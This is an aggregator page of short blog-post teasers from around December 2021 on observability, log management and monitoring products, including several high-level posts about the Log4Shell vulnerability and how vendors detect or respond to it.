Operations | Monitoring | ITSM | DevOps | Cloud

December 2021

ECS Monitoring Metrics that Help Optimize and Troubleshoot Tasks

Compute functions that run on Amazon’s Elastic Container Service (ECS) require regular monitoring to ensure proper running and managing of containerized functions on AWS – in short, ECS monitoring is a must. ECS can manage containers with either EC2 or Fargate compute functions. While EC2 and Fargate are compute services, EC2 allows users to configure virtually every functional aspect. Fargate is more limited in its available settings but is simpler to set up.

Log4J Does What?!!!

You have probably heard of Log4Shell, the security vulnerability that has ‘earned’ itself an NIST rank of 10: In this post I will show a really basic example of how this vulnerability actually works. I will walk you through some basic usage of the Log4J library and then show how some fairly basic inputs into this library can cause truly unexpected, and potentially disastrous, outcomes.

What are AWS EC2 Instances? A Tutorial for EC2 Metrics Shipping with Logz.io

Amazon Elastic Compute Cloud (a.k.a., EC2), is no doubt the core current computing infrastructure. It sits at the heart of AWS, the main kind of structure for housing virtual machines and containers for development and operations. Applying standards of observability with EC2 logs and obviously EC2 metrics (or any kind of AWS metrics for that matter) will inform you on if you have the right sorts of instances in place (and the appropriate size of those instances).

Grafana Loki 2021: Year in review

This year, we were excited to deliver the easiest version of Grafana Loki to use yet. With Loki 2.4, the Loki team introduced a simple, scalable deployment, and over the past 12 months, we added lots of great new features. Not to mention, we launched Grafana Enterprise Logs, a new addition to the Grafana Enterprise Stack that’s powered by Loki. But none of this would have been possible without our active community: In 2021, Loki had 166 contributors and 823 PRs in GItHub.

How to Detect Log4Shell Events Using Coralogix

The Log4J library is one of the most widely-used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J, also known as log4shell, framework that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of the Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.

Monitoring Office365 and Azure Health Status with Coralogix

Life is all about perspective, and the way we look at things often defines us as individuals, professionals, business entities, and products. How you understand the world is influenced by many details, or in the case of your application – many data sources. At Coralogix, we not only preach comprehensive data analysis but strive to enable it by continuously adding new ways to collect data.

Top Data Visualisation Tools (2023 Edition)

If you have been trying to compare all of the best data visualisation tools you may have found it difficult to find a detailed list that includes both open-source and proprietary solutions to help you compare and make an informed decision on what you need going forward. In this guide, you will find out everything you need to know about the leading solutions for data visualisation to help you get started with your next analysis project.

To Mask, or Not to Mask? That Is the Question

While I write this blog post, I reflect on the years of being a system administrator and the task of ensuring that no sensitive data made its way past me. What a daunting task right? The idea that sensitive data can make its way through our systems and other tools and reports is terrifying! Not to mention the potential financial/contractual problems this can cause.

Database monitoring with Sumo Logic and OpenTelemetry-powered distributed tracing

We are living in a data world. Data describes and controls almost every aspect of our life, from the president's elections to everyday grocery shopping. Data grows exponentially and so does the complexity of applications that manage that data. We all know the recent shift to microservices and other revolutionary changes that happened in the way we design, develop, deploy and operate modern applications.

Log4Shell: How We Protect Sematext Users

On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code on the vulnerable server. This vulnerability was registered on the National Vulnerability Database as CVE-2021-44228, with a severity score of 10. Here is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).

How to Perform Log Analysis

Logfile analysis plays a central role in enhancing the observability of your IT estate, helping operations teams and SRE engineers to identify issues as they emerge and track down the cause of failures quickly. As the number of log entries generated on any given day in a medium-sized business easily numbers in the thousands, viewing and analyzing logs manually to realize these benefits is not a realistic option. This is where automated real-time log analysis comes in.

Simplify Your Budget Planning with Ingest-Only Pricing for LogStream Cloud

Over the last year, we’ve seen tremendous growth in both demand and usage for LogStream Cloud. It is exciting to be able to speed up time to value, reduce the total cost of ownership, and deliver LogStream to customers in a way that best fits their organizational needs. We here at Cribl have been working with our cloud customers to better understand how to optimize LogStream Cloud pricing to provide the best possible ROI.

Splunk RUM Frontend Error Monitoring is Now Generally Available!

Debugging errors is an essential component to SRE and developer workflows. “How do we prioritize and isolate JavaScript errors more effectively?” is a top challenge we hear from engineering teams looking to improve end-user experience. Therefore, we are excited to announce the general availability of Splunk RUM frontend error monitoring.

The 2022 State of Observability Report

Interest in observability is at an all-time high. When we attended KubeCon in Los Angeles in October, observability and security were everywhere—in conversations with attendees and other vendors, during sessions, and in messaging at booths—indicating that there’s still an unmet need. In fact, Gartner declared that observability is at the ‘peak of inflated expectations' in a recent Hype Cycle report.

How to find cloud logs and manage logging costs

We covered best practices for ingesting, centralizing, and managing cloud logs in our previous episode. But how can you quickly find the logs you're looking for when troubleshooting? And how can you manage and optimize your logging costs? In this episode, we'll show you how to use advanced log queries to find the exact logs you're looking for and how to manage logging costs.

Splunk Mobile, iPad, AR and TV in Private Networks

Having Splunk Mobile available in your pocket is great, but what if you're not able to take advantage of it because of Defense Federal Acquisition Regulation Supplement (DFARS) requirements or security concerns? Through this blog post, you'll learn how deploying a Private Spacebridge might be the right answer!

Get Started with the Public Beta for Unified Dashboards

During Logz.io’s ScaleUp 2021 user conference, we announced that Unified Dashboards were coming to you soon. And now it’s finally here for anyone to try during the Public Beta. Unified Dashboards will allow Logz.io customers to analyze and filter their logs, metrics, and traces side-by-side on a single monitoring dashboard. Check out our recent blog to learn about why we built Unified Dashboards and the value they bring to customers.

Splunk AR - What's new .conf 2021

Want to deploy Splunk AR out in the field? Splunk AR is a powerful application that allows field workers to quickly gain valuable insights from assets in your deployment. With Splunk data supporting them, field workers can take action. In addition, we’ve built a powerful admin suite to support making an AR experience seamless and manageable. In this video, we talk about all the new capabilities we’ve built in 2021 for Splunk AR and how your company can take advantage of it.

Coralogix is Live in the Red Hat Marketplace!

Coralogix is excited to announce the launch of our Stateful Streaming Data Platform that is now available on the Red Hat Marketplace. Built for modern architectures and workflows, the Coralogix platform produces real-time insights and trend analysis for logs, metrics, and security with no reliance on storage or indexing. Making it a perfect match for the Red Hat Marketplace. Request a Demo.

Managing Your SIEM EPS License with Cribl LogStream

We see unfriendly customer practices all around in the SIEM space. For example, some major SIEM vendors use an Events Per Second (EPS) license model to monetize access to their tools. Typically, these vendors will drop data above the EPS license or stop data ingestion to incentive license compliance if you run over your EPS license. These license controls disrupt operations and risk enterprise security posture, which can cause chaos.

Host and process metrics - monitoring beyond apps

Consumers and users of applications expect near 100% availability and reliability to work, transact, collaborate, etc. There’s a lot of talk about monitoring the performance of the application itself, but what about the underlying systems and components supporting the app, and in particular the infrastructure it sits on? If any piece of this stack fails, it can negatively impact the user experience, and in turn, your business.

Catching Malicious Log4j/Log4Shell Events In Real Time with LogStream

The recent Apache Log4j vulnerability CVE-2021-44228 dubbed Log4Shell is a big deal. By now there is no shortage of blogs, other write-ups, and analysis about why this vulnerability is an urgent issue and why there is a very good chance it applies to your environment. Here are some of the articles that dive into the gory details on this CVE.

Splunk Cloud Self-Service: Announcing The New Admin Config Service API For Private Applications

In our last blog, "Splunk Cloud Self-Service: Announcing the Admin Config Service (ACS)" we introduced our modern, cloud-native API that is enabling Splunk Cloud Platform admins to manage their environments in a self-service fashion. In this blog, we take a look at our latest effort to empower our customers: ACS private app management.

What is the Log4j 2 Vulnerability?

Over the last few days, there have been a tremendous amount of posts about the Log4j 2 vulnerability, with Wired going so far as claiming that, “the internet is on fire.” Tl;dr: LogDNA is not exposed to risk from the Log4Shell vulnerability in Log4j 2 at this time. If that’s all you came for, you can stop reading here. If you want to learn more about the vulnerability and how LogDNA protects you from risks like these, grab a cup of coffee and read on.

Observing Kubernetes With LM Logs

As more and more IT organizations move towards containerized workloads and services, it is more important than ever to have insight into the containers and the services running within. Leading the container orchestration charge is Kubernetes (aka k8s – the 8 represents the letters omitted from the middle of the word). In fact, about two-thirds of IT engineers have seen their Kubernetes option increase during the pandemic as there becomes more need for scaling and performance.

What are Linux Logs? How to View Them, Most Important Directories & More

In software, it’s essential to monitor logs of system activities. Today we’ll unravel what Linux logs are and how you can view them. Logging is a must for today’s developers and why Retrace was designed with a built-in, centralized log management tool.

ElasticON Global Opening Keynote: Solving for Innovation

Join co-founder and CEO Shay Banon, Chief Product Officer Ash Kulkarni, and special guest Scott Guthrie, Executive Vice President of Cloud and AI at Microsoft, to hear the latest about Elastic’s vision for the future. Speakers: Shay Banon, Founder & CEO, Elastic Ash Kulkarni, Chief Product Officer, Elastic Scott Guthrie, Executive Vice President of Cloud and AI, Microsoft

Elastic Observability Keynote: Unified, Actionable, Frictionless

Elastic Observability makes it easier for organizations to store, search, and analyze any type of data, from any source, to keep systems running (and customers happy). And with our most recent release, we’ve continued to make this even faster and simpler, from automated root cause analysis to centralized agent management with Elastic Agent. Join the keynote to learn what’s on the Elastic Observability roadmap and how upcoming innovations will continue to break down barriers for users with frictionless onboarding, integrated workflows, and actionable observability with AIOps.

What is eBPF and Why is it Important for Observability?

Observability is one of the most popular topics in technology at the moment, and that isn’t showing any sign of changing soon. Agentless log collection, automated analysis, and machine learning insights are all features and tools that organizations are investigating to optimize their systems’ observability. However, there is a new kid on the block that has been gaining traction at conferences and online: the Extended Berkeley Packet Filter, or eBPF. So, what is eBPF?

Getting the Memo: Breaking Down the OMB's M-21-31

If you read my last blog post, you’re already ahead of the game. You know that in May of 2021, the Biden Administration announced Executive Order (EO) 14028: Improving the Nation’s Cybersecurity, which mandates each federal agency to adapt to today’s continuously changing threat environment. Well, folks, the saga continues.

High Five: The Latest Integrations from Splunk, Microsoft and GitHub

Hello Splunk Nation! Welcome to the latest roundup of Splunk integrations with Microsoft and GitHub! Hopefully, you had a chance to virtually attend.conf21 and check out all the amazing content. For those of you who missed it, we’re recapping the Microsoft, GitHub and Splunk highlights below.

Accelerating Cloud Monitoring via the Logz.io Azure Native Integration

Watch this Logz.io and the Azure Cloud team webinar to learn about the Logz.io Azure Marketplace native integration. More specifically, about: Collecting logs from Azure resources or applications in minutes with Logz.io — all within the Azure Portal. Integrate Logz.io with Active Directory SSO for access control. Collect their logs through a new “pay for what you use” pricing model — rather than committing to log volumes and plans upfront.

Introducing... Splunk for iPad!

Are you busy and on the go but still need to dig into your data and view your dashboards? We’ve got you covered — introducing… Splunk for iPad! Splunk for iPad is designed for and dedicated to what’s unique and great about the iPad, taking full advantage of its portable and interactive nature with unique dashboard annotation and note-taking features.

Python JSON Log Limits: What Are They and How Can You Avoid Them?

Python JSON logging has become the standard for generating readable structured data from logs. While logging in JSON is definitely much better than using the standard logging module, it comes with its own set of challenges. As your server or application grows, the number of logs also increases exponentially. It’s difficult to go through JSON log files, even if it’s structured, due to the sheer size of logs generated.

Are You Ready to (Executive) Order?

We’ve all been there. That harrowing moment at the restaurant when the waiter comes to the table and asks that fateful question: “Are you ready to order?” I don’t know about you, but I am almost never ready. Do I want chicken or steak? I’ve eaten a lot of meat this week… Should I opt for fish or a vegetarian option instead? Oh, God. I forgot to check the reviews online. What do other people like the best? Cue heart palpitations.

Why Data Maturity Matters | Prof. Sally Eaves, Ronald van Loon and Splunk's Mark Woods

In today’s world, data is a strategic asset helping organisations not just survive but thrive. Our current era of innovation is propelled by those who are doing more than just storing and managing data. Splunk’s latest State of Data Innovation report revealed that organisations that invested in placing data at the core of their operations were twice as innovative and productive as those that didn’t. Prof. Sally Eaves, Ronald van Loon and Splunk's own Mark Woods discuss how organisations not only need a complete view of their data but the ability to act upon their data quickly.

Performance Testing Tools: 8 to Help Find Your Bottlenecks

Performance is a vital component of user experience. Users will leave—and likely not come back—if your site is slow. If they stay, they’ll be less likely to buy from you if their experience is subpar. To add insult to injury, they’re even less likely to find your app to begin with, since Google punishes poorly-performing sites in the search results. To solve the problem of poor performance, knowledge of what impacts performance is essential.

New feature in Loki 2.4: no more ordering constraint

A new version of Loki was released back in November, and I’m here to talk about one of its most exciting features. Loki 2.4 finally removed the requirement that all data must be ingested in timestamp-ascending order. Instead, Loki now allows out of order logs up to a configurable validity window (more to come on that). In this post, I’ll walk through what all this means and why we’re thrilled about it.

An Introduction to Log Analysis

If you think log files are only necessary for satisfying audit and compliance requirements, or to help software engineers debug issues during development, you’re certainly not alone. Although log files may not sound like the most engaging or valuable assets, for many organizations, they are an untapped reservoir of insights that can offer significant benefits to your business.

Live from AWS re:Invent - Time Travel with Splunk and AWS

Presenters: Jon LeBaugh and Robert Gustafson Time Travel is possible! Well, at least for data in Splunk. Learn how and why we use AWS Lambda, Splunk smart store, and Amazon S3 to move data into the future in the behind the scenes look at Splunk’s Boss of Ops and O11y capture the flag competition.

Live from AWS re:Invent - Metrics and Logs Sitting in a Tree, Lowering your MTT*s

We all know by now that the exponential increase in cloud complexity has required a shift in traditional monitoring. These major changes lead to major challenges. Most environments are becoming more and more difficult to predict outages and determine root cause. There is a need for both real-time monitoring and alerting as well as a way to flexibly dig into your data to determine true root cause. Introducing the hottest new couple: metrics and logs. Come see how this duo can help speed up cloud adoption, future-proof your cloud monitoring, and lower MTTD and MTTR.

Five things everyone needs to know about their AWS environment that they can't see from Cloudwatch

At Splunk we love AWS, and we love all things Cloudwatch... it's a great source of data to collect and correlate. Sometimes we get asked "Why do I need Splunk when I have Cloudwatch dashboards?" What a great question! Join this session to learn about five critical insights about your AWS environment that you'll never get using Cloudwatch alone. Behold the power of Splunk's search and analysis platform!

Splunk Mobile for Private Networks

Are you working in a secure environment and want to take advantage of Splunk Mobile and Connected Experiences? Welcome to Private Spacebridge, a version of Spacebridge that you can deploy and manage in your own Kubernetes cluster. Check out this video where Joe, our SR Spacebridge engineer, explains what Private Spacebridge is all about and how it works to get you securely routing mobile traffic through your environment.

Best Practices for Cloud Logging

In our last episode, we covered how to best deploy and use Cloud Monitoring. This week, we answer the most important questions about Cloud Logging - what’s the best way to ingest logs? And how do you centralize logs and manage access? Watch this episode of Engineering for Reliability to learn some best practices for using Cloud Logging. Watch to learn how to keep your services reliable and your users happy.

DevOps State of Mind Podcast Episode 3: DevRel and DevOps, Two Peas in a Pod

‍Joe Karlsson is a senior developer advocate at SingleStore. SingleStore has a highly scalable SQL database that delivers maximum performance for transactional and analytical workloads, all with familiar relational data structures. Joe collaborates with teams across the company to amplify developers' voices and provide support for multiple audiences. Today, we're going to talk about cross team empathy and why DevRel and DevOps work hand in hand.

Solution Brief: Increase Data Visibility and Accelerate Attack Resolution with Exabeam and Cribl LogStream

Traditional security tools struggle to adapt to the new world of cyber threats. To keep up with the growing number of daily threats, understaffed security teams need new cloud-delivered solutions and tactics focused on generating attack resolutions, consistently and repeatedly. Enter Exabeam. Exabeam powers security teams with analytics-driven insights to uncover, investigate, and resolve threats legacy tools may miss.